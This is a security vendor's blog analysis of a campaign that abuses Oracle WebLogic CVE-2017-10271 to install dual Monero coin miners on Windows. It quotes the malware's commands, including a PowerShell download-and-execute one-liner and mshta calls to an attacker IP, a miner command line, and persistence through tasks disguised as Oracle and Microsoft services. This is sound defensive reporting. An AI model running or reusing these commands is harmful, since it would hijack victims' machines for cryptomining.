Oracle Server Vulnerability Exploited to Deliver Double Monero Miner Payloads

by Johnlery Triunfante and Mark Vicente

The sudden rise of cryptocurrency triggered a shift in the target landscape. Cybercriminals started adapting and using their resources to try acquiring cryptocurrencies, whether through pursuing repositories like Bitcoin wallets or by compromising networks and devices to mine the currency. This isn’t completely new — ransomware authors have been using bitcoin as their preferred currency for years. But more recently, we saw examples of cryptocurrency miners in late October of 2017 when coin miner mobile malware appeared on popular app stores, and in December 2017 when the Digmine cryptocurrency miner was spreading through social media messaging apps.

Now, CVE-2017-10271, a patched Oracle WebLogic WLS-WSAT vulnerability that allows for remote code execution, is being abused to deliver two different cryptocurrency miners: a 64-bit variant and a 32-bit variant of an XMRig Monero miner. If one version is not compatible with the Windows computer that is infected, then the other will run. Figure 1 shows that the code for the exploit is still being developed. This report analyzes the latest version.

Figure 1. Comparison of the code’s older version (right side) and newer version (left side) with a new component (boxed in red)

Exploit drops dual miner payloads

At the time of writing, we saw that CVE-2017-10271 was being exploited and delivering a weighty payload detected by Trend Micro as Coinminer_MALXMR.JL-PS. When executed successfully, it can leave the infected machine with dual Monero miners.

Figure 2. How the payload of the exploit may look like (executes Coinminer_MALXMR.JL-PS)

Once Coinminer_MALXMR.JL-PS is executed, it will download three files to the machine: its mining component javaupd.exe (detected as Coinminer_TOOLXMR.JL-WIN64), its auto-start component startup.cmd (detected as Coinminer_MALXMR.JL-BAT), and also another malicious file 3.exe (detected as Coinminer_MALXMR.JLT-WIN32).

Our analysis of the latest payload shows that the architecture of Windows OS plays a part in deciding which coin miner will run. The first Monero miner is a 64-bit variant which will execute on a corresponding 64-bit Windows device. But, if the device is running a 32-bit Windows version then the second coin miner will run instead.

More devices compromised with multiple miner versions

The process begins with the installation of an auto start component on the machine. At the time of writing, the malware does this by copying startup.cmd to the Startup folder. The .cmd file opens on system startup then executes mshta hxxp://107.181.174.248/web/p.hta next, which then executes a Powershell command:

cmd /c powershell.exe -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString(‘hxxp://107.181.174.248/web/check.ps1’))

The malware creates two different scheduled tasks:

1. The first task tries to download the coin miner and execute it again and again. Mshta hxxp://107.181.174.248/web/p.hta runs and is scheduled with the name “Oracle Java update.” It executes every 80 minutes, and its process is the same as the startup.cmd file.
2. The other scheduled task is named “Oracle Java.” It executes daily and terminates the first mining component. It proceeds with the following commands:

• “cmd /c taskkill /im powershell.exe /f”
• “cmd /c taskkill /im javaupd.exe /f”
• “cmd /c taskkill /im msta.exe /f” (We suspect that this is a mistake on the developer’s part and should be mshta.exe.)

After creating these scheduled tasks, Coinminer_MALXMR.JL-PS will then execute its coin mining component javaupd.exe, which allows the mining process to start. It uses the following command:

cmd.exe /c C:\ProgramData\javaupd.exe -o eu.minerpool.pw:65333 -u {Computer Name}

The mining can slow down the system and affect performance.

The second payload, which is the downloaded 3.exe file, will check if the system is running a 32-bit or 64-bit platform. Based on the operating system architecture, it will download and execute a new file LogonUI.exe (detected as COINMINER_MALXMR.JL-WIN32). If the first 64-bit coin miner component is not running, LogonUI.exe will download a .DLL file (detected as COINMINER_MALXMR.FD-WIN32) which will then download and execute the second coin mining component sqlservr.exe (detected as COINMINER_TOOLXMR.JL-WIN32).

This second component is compatible with a 32-bit Windows platform and will run instead of the first. It is also capable of auto-starting and creates a scheduled task that enables it to automatically execute daily:

1. LogonUI is registered as a service
2. The service is named “Microsoft Telemetry”
3. Creates scheduled tasks that will execute “Microsoft Telemetry” daily

Figure 3. The payload execution chain of the coin miner

A coin-mining malware tries to infect as many devices as possible since it takes an extraordinary amount of computing power to substantially mine any cryptocurrency. With two payload systems, both of which are capable of starting automatically and daily, the malware developers of this particular exploit have more chances to infect machines and use them for cryptomining.

This particular miner also aims to make the most of the machine it has infected by shutting down other malware. It actually terminates spoosvc.exe and deletes the scheduled task “Spooler SubSystem Service,” which is a known behavior of another cryptocurrency miner detected as TROJ_DLOADR.AUSUHI.

Impact on user and possible countermeasures

This malware uses the system’s central processing unit (CPU) and/or the machine’s graphical processing unit (GPU) resources, making the system run abnormally slow. The user may not attribute the issue to a compromise at first since the effects can be caused by other factors. But, as we mentioned, cryptocurrency miners have been on the rise since mid-2017, and users should expect more malware variants that aim to hijack their system resources. Cybercriminals are taking every opportunity and experimenting with new ways to deliver mining malware to users.

Regularly patching and updating software can mitigate the impact of cryptocurrency malware and other threats that exploit system vulnerabilities (the vulnerability discussed above was patched October 2017). IT/system administrators and information security professionals can also consider application whitelisting or similar security mechanisms that prevent suspicious executables from running or installing. Proactively monitoring network traffic helps better identify red flags that may indicate malware infection. Trend Micro Smart Protection Suites and Worry-Free Business Security protect end users and businesses from threats by detecting and blocking malicious files and all related URLs. Trend Micro Smart Protection Suites deliver several capabilities — such as high-fidelity machine learning, web reputation services, behavior monitoring, and application control — that minimize the impact of this cryptocurrency miner and other threats.
In addition, Trend Micro Deep Discovery Inspector protects customers via these DDI rules:

• DDI Rule ID 3874:CVE-2017-10271 – Oracle Weblogic Exploit – http (Request)

Indicators of Compromise

Post from: Trendlabs Security Intelligence Blog – by Trend Micro

Oracle Server Vulnerability Exploited to Deliver Double Monero Miner Payloads

Read more: Oracle Server Vulnerability Exploited to Deliver Double Monero Miner Payloads